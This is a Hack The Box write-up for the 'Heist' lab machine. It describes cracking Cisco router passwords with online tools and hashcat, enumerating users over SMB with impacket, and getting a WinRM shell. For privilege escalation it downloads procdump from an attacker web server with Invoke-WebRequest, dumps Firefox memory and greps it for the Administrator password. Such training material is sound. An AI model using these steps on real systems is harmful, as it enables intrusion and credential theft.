Hack The Box – Heist Writeup by Nikhil Sahoo

Introduction

Back with a new blog. Today we will go through the walkthrough of the Hack the Box machine Heist which retired very recently. It was given the easy level but I felt it was quite tricky and a bit difficult, the reason being that I’m completely a noob and always get scared when it comes to Windows exploitation. But we all need to start from somewhere so thought of giving this box a try. So without further ado let’s begin…

Recon

We’ll start with our recon by doing an Nmap scan.

nmap -sC -sV -p- 10.10.10.149

 

So port 80 is open. Let’s check that first in our browser

 

It’s a login portal. There’s an option below to login as a guest so let’s try that.

From the above picture, we can clearly see that there’s a chat session between a user Hazard and the support admin where the user Hazard has some issues with his cisco router and has attached the configurations for it and has also requested the admin to create an account for him… These chats are very important for our further steps 😉 .

Let’s download the attachment and try to analyze it.

Looks like it contains 2 cisco type 7 and 1 type 5 passwords… We can decyprt type 7 passwords using no of tools available online. I used the following link :

http://ibeast.com/tools/CiscoPassword

 

So here are the credentials we have collected till now:

rout3r: $uperP@ssword

admin: Q4)sJu\Y8qz*A3?d

But on using these credentials on the login portal we won’t be able to login successfully 🙁

We also have another cisco type 5 password and we will be using hashcat for cracking it.

So on typing in hashcat -h we can check the number associated with the hash type.

 

So let’s run hashcat by typing in:

hashcat -m 500 <your_hash_file> <password_list_file> –force –outfile output.txt 

 

And we have cracked it successfully:

$1$pdQG$o8nrSzsGXeaduXrjlvKc91 : stealth1agent

But on trying this password in the login portal we still won’t be able to login 🙁

Let’s again check our Nmap scan. We can see that the 5895 port is open which is used by WinRm (Microsoft Windows Remote Management) which is basically a service/protocol used to manage remote systems.

So here’s an amazing ruby script that would give us a shell:

https://alionder.net/winrm-shell/

I tried with all possible usernames and passwords collected till now but again I got no success -_-

Anyway, after banging my head for quite long, I got a hint from the forum that we can enumerate more users by bruteforcing SIDs (Security Identifiers) through SMB.

We can use lookupsid.py from impacket to bruteforce more users. To know more about impacket follow this link here

Exploitation

And after a lot of combinations, this following pair finally worked “Hazard:stealth1agent” and it was able to bruteforce more users.

python lookupsid.py Hazard:stealth1agent@10.10.10.149

 

Let’s try all these users again for connecting to the machine via WinRM.

And the following pair seemed to work: “Chase:Q4)sJu\Y8qz*A3?d

 

So let’s try to run the ruby file now…

And we should be getting our user flag.

 

Privilege Escalation

Now moving on for our root flag.

Let’s do a quick ps to check all the processes running.

So we see firefox instances running. We can check if any sensitive pieces of information are present in the memory/ram by taking a dump of the firefox process.

We can user Procdump.exe which could be downloaded from here:

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

After downloading the exe file we will place it in our web server (inside /var/www/html/) and run service apache2 start to start the webserver.

Now moving back to the shell we can download a file using Invoke-WebRequest command.

so type in the following command to download the exe file in the current directory:

Invoke-WebRequest -Uri http://webserver/procdump64.exe -OutFile proc.exe

We will be taking the dump of the firefox process next. There are around 4 firefox processes. We will take the dump of the one that has the highest CPU usage.

So type in the following to take the dump:

./proc.exe -ma <process_id>

 

This will create a dump. Now next is to analyze it. I actually wanted to transfer the dump to my machine but couldn’t find a way.

But we could still analyze it to search for sensitive pieces of information from our WinRM shell itself.

On running, cat over that dump will give us a hell lot of information so what we can do is we can grep some important strings like username or password.

cat firefox.exe_191130_175757.dmp | Select-String “username=

Here Select-String in PowerShell is basically equivalent to grep in Linux.

 

We can use the creds above to login via WinRM again using the same script used before. Just change the username to Administrator and password to the string that we got from the dump(shown in the picture above).

 

All set, let’s run the ruby script and we should be getting our root flag.

 

And that’s the end of the box.

So that’s for now. See you next time. Goodbye

You can have a look at my previous article on A tale of an S3 Bucket Misconfiguration. Here is the link of the article

Loved what you read?

If so, then kindly comment, follow and share our website for much more interesting stuff  ?

For any queries you can send a Hi to my Linkedin Handle: Here

 

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *